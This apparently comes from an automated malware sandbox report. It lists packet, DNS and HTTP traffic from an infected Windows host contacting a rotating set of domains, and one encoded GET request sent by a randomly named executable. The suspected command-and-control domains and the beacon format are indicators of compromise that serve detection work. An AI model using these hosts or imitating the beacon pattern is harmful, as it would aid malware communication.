Jan 15, 2025 08:29:30.270795107 CET	80	49910	85.159.66.93	192.168.2.6
Jan 15, 2025 08:30:30.970251083 CET	80	49910	85.159.66.93	192.168.2.6
Jan 15, 2025 08:30:30.970396996 CET	80	49910	85.159.66.93	192.168.2.6
Jan 15, 2025 08:30:30.972757101 CET	49910	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:30:30.972757101 CET	49910	80	192.168.2.6	85.159.66.93
Jan 15, 2025 08:30:30.977719069 CET	80	49910	85.159.66.93	192.168.2.6
Jan 15, 2025 08:30:36.016901970 CET	49913	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:36.021845102 CET	80	49913	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:36.021974087 CET	49913	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:36.024121046 CET	49913	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:36.028923035 CET	80	49913	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:36.677772045 CET	80	49913	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:36.677836895 CET	80	49913	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:36.677922964 CET	49913	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:37.537651062 CET	49913	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:38.556013107 CET	49914	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:38.710681915 CET	80	49914	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:38.710841894 CET	49914	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:38.716013908 CET	49914	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:38.720865965 CET	80	49914	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:39.366835117 CET	80	49914	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:39.366906881 CET	80	49914	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:39.368093967 CET	49914	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:40.225296021 CET	49914	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:41.244354963 CET	49915	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:41.249547958 CET	80	49915	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:41.250016928 CET	49915	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:41.252074003 CET	49915	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:41.257004976 CET	80	49915	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:41.257091045 CET	80	49915	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:41.895771980 CET	80	49915	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:41.895793915 CET	80	49915	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:41.895849943 CET	49915	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:42.756557941 CET	49915	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:43.774983883 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:43.779880047 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:43.779978991 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:43.781824112 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:43.786567926 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635128021 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635144949 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635154963 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635164976 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635175943 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635185957 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635198116 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635207891 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635217905 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635230064 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.635382891 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.635384083 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.640238047 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.640249014 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.640258074 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.644046068 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.732253075 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732266903 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732287884 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732300043 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732312918 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732326031 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732567072 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.732567072 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.732906103 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732939959 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732953072 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.732959986 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.733166933 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.733460903 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:44.733917952 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.737303019 CET	49916	80	192.168.2.6	91.195.240.94
Jan 15, 2025 08:30:44.742082119 CET	80	49916	91.195.240.94	192.168.2.6
Jan 15, 2025 08:30:57.952817917 CET	49917	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:30:57.957606077 CET	80	49917	66.29.149.46	192.168.2.6
Jan 15, 2025 08:30:57.957673073 CET	49917	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:30:57.960477114 CET	49917	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:30:57.965332985 CET	80	49917	66.29.149.46	192.168.2.6
Jan 15, 2025 08:30:58.598176003 CET	80	49917	66.29.149.46	192.168.2.6
Jan 15, 2025 08:30:58.598236084 CET	80	49917	66.29.149.46	192.168.2.6
Jan 15, 2025 08:30:58.600423098 CET	49917	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:30:59.479397058 CET	49917	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:00.493943930 CET	49918	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:00.498857975 CET	80	49918	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:00.498939037 CET	49918	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:00.500895977 CET	49918	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:00.505681992 CET	80	49918	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:01.115585089 CET	80	49918	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:01.115670919 CET	80	49918	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:01.115822077 CET	49918	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:02.006597042 CET	49918	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:03.026319981 CET	49919	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:03.032794952 CET	80	49919	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:03.032955885 CET	49919	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:03.034581900 CET	49919	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:03.041048050 CET	80	49919	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:03.041363001 CET	80	49919	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:03.651276112 CET	80	49919	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:03.651417017 CET	80	49919	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:03.651463032 CET	49919	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:04.537687063 CET	49919	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:05.558418989 CET	49920	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:05.563376904 CET	80	49920	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:05.563460112 CET	49920	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:05.565576077 CET	49920	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:05.570401907 CET	80	49920	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:06.171173096 CET	80	49920	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:06.171230078 CET	80	49920	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:06.171459913 CET	49920	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:06.175192118 CET	49920	80	192.168.2.6	66.29.149.46
Jan 15, 2025 08:31:06.180011988 CET	80	49920	66.29.149.46	192.168.2.6
Jan 15, 2025 08:31:11.284550905 CET	49921	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:11.289472103 CET	80	49921	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:11.290632963 CET	49921	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:11.292511940 CET	49921	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:11.297338009 CET	80	49921	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:11.957542896 CET	80	49921	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:11.957881927 CET	80	49921	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:11.957943916 CET	49921	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:12.803611994 CET	49921	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:13.826026917 CET	49922	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:13.830993891 CET	80	49922	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:13.831067085 CET	49922	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:13.841084957 CET	49922	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:13.845892906 CET	80	49922	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:14.503432989 CET	80	49922	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:14.504017115 CET	80	49922	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:14.504066944 CET	49922	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:15.350665092 CET	49922	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:16.394490957 CET	49923	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:16.399449110 CET	80	49923	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:16.399519920 CET	49923	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:16.414741993 CET	49923	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:16.419619083 CET	80	49923	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:16.419675112 CET	80	49923	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:17.091588974 CET	80	49923	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:17.091911077 CET	80	49923	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:17.092097044 CET	49923	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:17.928457022 CET	49923	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:18.974247932 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:18.979240894 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:18.985902071 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:18.985902071 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:18.990741968 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:19.662909985 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:19.801583052 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:19.842540026 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:19.842576027 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:19.842655897 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:19.842673063 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:19.843616009 CET	49924	80	192.168.2.6	195.110.124.133
Jan 15, 2025 08:31:19.848478079 CET	80	49924	195.110.124.133	192.168.2.6
Jan 15, 2025 08:31:41.050448895 CET	49925	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:41.055310965 CET	80	49925	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:41.055406094 CET	49925	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:41.058429003 CET	49925	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:41.063308954 CET	80	49925	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:41.615114927 CET	80	49925	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:41.615528107 CET	80	49925	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:41.615799904 CET	49925	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:42.569124937 CET	49925	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:43.590223074 CET	49926	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:43.595079899 CET	80	49926	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:43.598623991 CET	49926	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:43.602781057 CET	49926	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:43.607633114 CET	80	49926	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:44.177155972 CET	80	49926	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:44.177568913 CET	80	49926	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:44.177741051 CET	49926	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:45.118505001 CET	49926	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:46.135725021 CET	49928	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:46.140618086 CET	80	49928	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:46.140774965 CET	49928	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:46.142512083 CET	49928	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:46.147281885 CET	80	49928	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:46.147496939 CET	80	49928	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:46.699182034 CET	80	49928	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:46.699409008 CET	80	49928	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:46.702588081 CET	49928	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:47.647171021 CET	49928	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:48.684612989 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:48.689435959 CET	80	49929	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:48.689717054 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:48.692162991 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:48.696921110 CET	80	49929	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:49.267287970 CET	80	49929	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:49.267415047 CET	80	49929	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:49.267637968 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:49.267911911 CET	80	49929	217.196.55.202	192.168.2.6
Jan 15, 2025 08:31:49.268466949 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:49.270571947 CET	49929	80	192.168.2.6	217.196.55.202
Jan 15, 2025 08:31:49.275494099 CET	80	49929	217.196.55.202	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 08:28:30.033633947 CET	49445	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:28:31.022077084 CET	49445	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:28:31.321070910 CET	53	49445	1.1.1.1	192.168.2.6
Jan 15, 2025 08:28:31.321088076 CET	53	49445	1.1.1.1	192.168.2.6
Jan 15, 2025 08:28:47.274687052 CET	59158	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:28:47.284101009 CET	53	59158	1.1.1.1	192.168.2.6
Jan 15, 2025 08:28:55.337750912 CET	61831	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:28:55.761673927 CET	53	61831	1.1.1.1	192.168.2.6
Jan 15, 2025 08:29:14.290822983 CET	55966	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:29:14.447645903 CET	53	55966	1.1.1.1	192.168.2.6
Jan 15, 2025 08:29:22.556410074 CET	59496	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:29:22.652409077 CET	53	59496	1.1.1.1	192.168.2.6
Jan 15, 2025 08:30:35.980089903 CET	56130	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:30:36.014173985 CET	53	56130	1.1.1.1	192.168.2.6
Jan 15, 2025 08:30:49.744443893 CET	60483	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:30:49.754656076 CET	53	60483	1.1.1.1	192.168.2.6
Jan 15, 2025 08:30:57.807164907 CET	57448	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:30:57.949529886 CET	53	57448	1.1.1.1	192.168.2.6
Jan 15, 2025 08:31:11.181487083 CET	49754	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:31:11.281456947 CET	53	49754	1.1.1.1	192.168.2.6
Jan 15, 2025 08:31:24.854419947 CET	51080	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:31:24.866319895 CET	53	51080	1.1.1.1	192.168.2.6
Jan 15, 2025 08:31:32.931708097 CET	63098	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:31:32.941951990 CET	53	63098	1.1.1.1	192.168.2.6
Jan 15, 2025 08:31:41.001269102 CET	52251	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:31:41.048058033 CET	53	52251	1.1.1.1	192.168.2.6
Jan 15, 2025 08:31:54.276582956 CET	50870	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:31:54.285439014 CET	53	50870	1.1.1.1	192.168.2.6
Jan 15, 2025 08:32:02.354967117 CET	50743	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:32:02.364002943 CET	53	50743	1.1.1.1	192.168.2.6
Jan 15, 2025 08:32:11.355354071 CET	52395	53	192.168.2.6	1.1.1.1
Jan 15, 2025 08:32:11.373713970 CET	53	52395	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 08:28:30.033633947 CET	192.168.2.6	1.1.1.1	0xb274	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:31.022077084 CET	192.168.2.6	1.1.1.1	0xb274	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:47.274687052 CET	192.168.2.6	1.1.1.1	0xe40b	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:55.337750912 CET	192.168.2.6	1.1.1.1	0x387d	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:29:14.290822983 CET	192.168.2.6	1.1.1.1	0xe28e	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:29:22.556410074 CET	192.168.2.6	1.1.1.1	0xfc65	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:35.980089903 CET	192.168.2.6	1.1.1.1	0xa3ac	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:49.744443893 CET	192.168.2.6	1.1.1.1	0x342e	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:57.807164907 CET	192.168.2.6	1.1.1.1	0xdb57	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:11.181487083 CET	192.168.2.6	1.1.1.1	0xbd7	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:24.854419947 CET	192.168.2.6	1.1.1.1	0xab64	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:32.931708097 CET	192.168.2.6	1.1.1.1	0x5bba	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:41.001269102 CET	192.168.2.6	1.1.1.1	0x3ca9	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:54.276582956 CET	192.168.2.6	1.1.1.1	0x4c21	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:32:02.354967117 CET	192.168.2.6	1.1.1.1	0xd140	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:32:11.355354071 CET	192.168.2.6	1.1.1.1	0xfa9	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 08:28:31.321070910 CET	1.1.1.1	192.168.2.6	0xb274	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:31.321088076 CET	1.1.1.1	192.168.2.6	0xb274	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:47.284101009 CET	1.1.1.1	192.168.2.6	0xe40b	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:28:55.761673927 CET	1.1.1.1	192.168.2.6	0x387d	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:29:14.447645903 CET	1.1.1.1	192.168.2.6	0xe28e	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:29:22.652409077 CET	1.1.1.1	192.168.2.6	0xfc65	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 08:29:22.652409077 CET	1.1.1.1	192.168.2.6	0xfc65	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 08:29:22.652409077 CET	1.1.1.1	192.168.2.6	0xfc65	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:36.014173985 CET	1.1.1.1	192.168.2.6	0xa3ac	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:49.754656076 CET	1.1.1.1	192.168.2.6	0x342e	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:30:57.949529886 CET	1.1.1.1	192.168.2.6	0xdb57	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:11.281456947 CET	1.1.1.1	192.168.2.6	0xbd7	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 08:31:11.281456947 CET	1.1.1.1	192.168.2.6	0xbd7	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:24.866319895 CET	1.1.1.1	192.168.2.6	0xab64	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:32.941951990 CET	1.1.1.1	192.168.2.6	0x5bba	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:41.048058033 CET	1.1.1.1	192.168.2.6	0x3ca9	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 08:31:41.048058033 CET	1.1.1.1	192.168.2.6	0x3ca9	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:31:54.285439014 CET	1.1.1.1	192.168.2.6	0x4c21	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:32:02.364002943 CET	1.1.1.1	192.168.2.6	0xd140	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:32:11.373713970 CET	1.1.1.1	192.168.2.6	0xfa9	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49864	154.215.72.110	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:28:31.336708069 CET	532	OUT	GET /fo8o/?pnGX8L3p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:28:32.233675003 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 15 Jan 2025 07:28:32 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
